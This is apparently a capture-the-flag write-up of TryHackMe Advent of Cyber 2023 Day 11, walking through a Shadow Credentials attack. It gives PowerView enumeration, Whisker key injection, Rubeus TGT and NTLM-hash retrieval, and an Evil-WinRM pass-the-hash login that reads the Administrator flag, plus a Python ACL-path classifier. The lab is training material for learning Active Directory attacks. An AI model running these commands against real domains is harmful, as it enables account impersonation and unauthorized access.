Huy Phu

Summary

The web content describes Day 11 of TryHackMe's Advent of Cyber 2023, focusing on Active Directory and the Shadow Credentials attack, including practical steps to abuse a GenericWrite permission using tools like PowerView, Whisker, and Rubeus, and concludes with a Pass-the-Hash attack to read a flag.txt file.

Abstract

Day 11 of TryHackMe's Advent of Cyber 2023 event delves into Active Directory security, specifically the concept of Shadow Credentials attacks. Participants learn about Windows Hello for Business and the prerequisites for exploiting GenericWrite privileges. The article provides a step-by-step guide on how to use PowerView.ps1 to identify principals with GenericWrite permissions over other users, and then abuse that permission with the Whisker and Rubeus tools to perform a Shadow Credentials attack. This involves adding an attacker-controlled public key to the target user's msDS-KeyCredentialLink attribute in order to impersonate them and gain unauthorized access. The guide concludes with a practical example of using the obtained NTLM hash to perform a Pass-the-Hash attack and access sensitive information, such as the content of flag.txt on the Administrator's Desktop.

Opinions

  • The article positions the Advent of Cyber 2023 event as an educational opportunity to understand complex cybersecurity concepts like Active Directory and Shadow Credentials attacks.
  • It suggests that the content is suitable for learners with some prior knowledge, as the techniques discussed are technical and involve advanced concepts such as GenericWrite permissions and Windows Hello for Business.
  • The author implies that the exercises are a good introduction to Microsoft Windows technologies, which are widely used in corporate environments, thus emphasizing the practical relevance of the learning material.
  • By providing a detailed walkthrough, the author conveys a helpful and informative tone, encouraging readers to engage with the content and reach out with questions.
  • The article concludes with a call to action, inviting readers to show appreciation for the post by clapping and following for more cybersecurity content, indicating the author's interest in building a community and sharing knowledge.

TryHackMe — Advent of Cyber 2023: [Day 11] Active Directory: Jingle Bells, Shadow Spells

Day 11 of TryHackMe’s Advent of Cyber 2023 has been launched.

Link: https://tryhackme.com/room/adventofcyber2023

Learning Objectives

  • Understanding Active Directory
  • Introduction to Windows Hello for Business
  • Prerequisites for exploiting GenericWrite privilege
  • How the Shadow Credentials attack works
  • How to exploit the vulnerability

Answer The Questions

What is the hash of the vulnerable user?

On the target machine, run powershell -ep bypass to start PowerShell with the Execution Policy bypassed, then load PowerView.ps1 into memory (for example by dot-sourcing it). Once the script is loaded, run the following command:

Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

The output shows that the hr user has GenericWrite permission over the vansprinkles user object, which we can leverage to perform a Shadow Credentials attack.
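To make the ACL check concrete, here is an added Python example (not code from the TryHackMe room or from PowerView) that decides which access-mask bits on a user object are enough to stage a Shadow Credentials attack, covering not only the room's GenericWrite case but also GenericAll, an attribute-scoped WriteProperty, and the indirect WriteDacl/WriteOwner paths. The access-mask constants are the standard ActiveDirectoryRights values and the msDS-KeyCredentialLink GUID is that attribute's real schemaIDGUID; the ACE rows, the extra identities (helpdesk, svc_backup) and the "other attribute" GUID are constructed for illustration.

```python
# Added example, not code from the TryHackMe room or from PowerView.
# Decide whether an ACE grants enough access to write msDS-KeyCredentialLink,
# the precondition for a Shadow Credentials attack. The ACE rows are constructed
# to resemble Find-InterestingDomainAcl output.
from typing import Optional

# Access-mask bits (ADS_RIGHTS_ENUM / .NET ActiveDirectoryRights)
GENERIC_ALL = 0x10000000
GENERIC_WRITE = 0x40000000
WRITE_OWNER = 0x00080000
WRITE_DACL = 0x00040000
WRITE_PROPERTY = 0x00000020
READ_PROPERTY = 0x00000010

# schemaIDGUID of the msDS-KeyCredentialLink attribute: a WriteProperty ACE
# scoped to this GUID is sufficient on its own.
KEY_CREDENTIAL_LINK_GUID = "5b47d60f-6090-40b2-9f37-2a4de88f3063"
# An absent or all-zero ObjectType GUID means the ACE covers every property.
ALL_PROPERTIES = "00000000-0000-0000-0000-000000000000"
# Placeholder GUID standing in for some unrelated attribute (constructed, not real).
OTHER_ATTRIBUTE_GUID = "11111111-2222-3333-4444-555555555555"


def classify_ace(access_mask: int, object_type: Optional[str] = None) -> Optional[str]:
    """Return why this ACE lets its trustee add a key credential, or None.

    Direct paths: GenericAll, GenericWrite, WriteProperty on the attribute (or
    on all properties). Indirect paths: WriteDacl / WriteOwner, which let the
    trustee grant themselves WriteProperty first. Property sets are not
    expanded here, so a WriteProperty ACE scoped to a set is treated as no match.
    """
    if access_mask & GENERIC_ALL:
        return "GenericAll"
    if access_mask & GENERIC_WRITE:
        return "GenericWrite"
    if access_mask & WRITE_PROPERTY:
        scope = (object_type or ALL_PROPERTIES).lower()
        if scope in (ALL_PROPERTIES, KEY_CREDENTIAL_LINK_GUID):
            return "WriteProperty on msDS-KeyCredentialLink"
    if access_mask & WRITE_DACL:
        return "WriteDacl (indirect: grant yourself WriteProperty first)"
    if access_mask & WRITE_OWNER:
        return "WriteOwner (indirect: take ownership, then rewrite the DACL)"
    return None


def find_shadow_credential_paths(aces: list) -> list:
    """Filter allow-ACEs to those usable for Shadow Credentials, with the reason."""
    paths = []
    for ace in aces:
        if ace.get("ace_type", "AccessAllowed") != "AccessAllowed":
            continue  # a deny ACE never grants anything
        reason = classify_ace(ace["access_mask"], ace.get("object_type"))
        if reason is not None:
            paths.append((ace["identity"], ace["object_dn"], reason))
    return paths


# Constructed sample ACL, modelled on the room: hr has GenericWrite over vansprinkles.
# The other trustees and ACEs are invented to exercise the remaining branches.
SAMPLE_ACES = [
    {"identity": "AOC\\hr", "object_dn": "CN=vansprinkles,CN=Users,DC=AOC,DC=local",
     "access_mask": GENERIC_WRITE},
    {"identity": "AOC\\hr", "object_dn": "CN=Administrator,CN=Users,DC=AOC,DC=local",
     "access_mask": READ_PROPERTY},
    {"identity": "AOC\\helpdesk", "object_dn": "CN=Administrator,CN=Users,DC=AOC,DC=local",
     "access_mask": WRITE_PROPERTY, "object_type": OTHER_ATTRIBUTE_GUID},
    {"identity": "AOC\\svc_backup", "object_dn": "CN=Administrator,CN=Users,DC=AOC,DC=local",
     "access_mask": WRITE_DACL},
    {"identity": "AOC\\hr", "object_dn": "CN=Administrator,CN=Users,DC=AOC,DC=local",
     "access_mask": GENERIC_ALL, "ace_type": "AccessDenied"},
]

if __name__ == "__main__":
    for identity, dn, reason in find_shadow_credential_paths(SAMPLE_ACES):
        print(f"{identity} -> {dn}: {reason}")
```

Run against the constructed ACL this reports hr over vansprinkles (GenericWrite) and svc_backup over Administrator (WriteDacl, indirect); the read-only ACE, the WriteProperty ACE scoped to an unrelated attribute and the deny ACE are ignored. The same classification is what you would apply to each row PowerView prints before deciding which target to hand to Whisker.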

Shadow Credentials Attacks

As mentioned above, the hr user has GenericWrite permission over the vansprinkles user, so hr can write to that user's msDS-KeyCredentialLink attribute.

msDS-KeyCredentialLink is the attribute in which the Domain Controller stores the public keys registered for Windows Hello for Business (WHfB) key-trust authentication. When a user enrolls a device, the device's public key is written to this attribute on the user's account, and from then on the DC accepts Kerberos pre-authentication (PKINIT) signed with the matching private key as proof of that user's identity.

A Shadow Credentials attack abuses exactly this: using hr's write access, we generate our own key pair and certificate and add the public key to vansprinkles' msDS-KeyCredentialLink. The DC now treats our key as a legitimate WHfB credential for vansprinkles, so we can authenticate as that user with our certificate without knowing or changing their password.

To do this, we use the tool Whisker.exe: whisker.exe add /target:vansprinkles

Now that we have a certificate for vansprinkles, we can run Rubeus to request a TGT as that user and recover the user's NTLM hash for further exploitation.

Whisker also printed out a command that can be used with Rubeus so we just need to copy and paste.

Rubeus.exe asktgt /user:vansprinkles /certificate:MIIJuAIBAzCCCXQGCSqGSIb3D[snip] /password:"kdZd2sxZquQ5DDT9" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

  • asktgt: requests a TGT
  • /user: the user we want to impersonate for the TGT
  • /certificate: the certificate generated by Whisker to impersonate the target user
  • /password: the password used to decrypt the certificate, since it is exported encrypted
  • /domain: the target domain
  • /dc: the Domain Controller that will issue the TGT
  • /getcredentials: also retrieves the user's NTLM hash, which is used in the next step

Answer: 03E805D8A8C5AA435FB48832DAD620E3

What is the content of flag.txt on the Administrator Desktop?

Now that we have the user's NTLM hash, we can use Pass-the-Hash to log in as vansprinkles. We will use Evil-WinRM on our attacking machine with the following syntax: evil-winrm -i $TARGET_IP -u $USER -H $HASH

evil-winrm -i 10.10.86.84 -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3

Read the flag.txt file on the Administrator's Desktop (cat is an alias of Get-Content in the PowerShell session Evil-WinRM provides):

cat C:\Users\Administrator\Desktop\flag.txt  

Conclusion

That is it for the room. It is a little technical for beginners who have no knowledge of Pass-the-Hash attacks or Active Directory. However, it is a nice introductory exercise to get familiar with these Microsoft Windows technologies, which dominate corporate environments. Feel free to contact me if you have any questions.

If you like my post, please give it a clap and follow for more Cybersecurity content.

Tryhackme
Active Directory
Advent Of Cyber 2023
Pass The Hash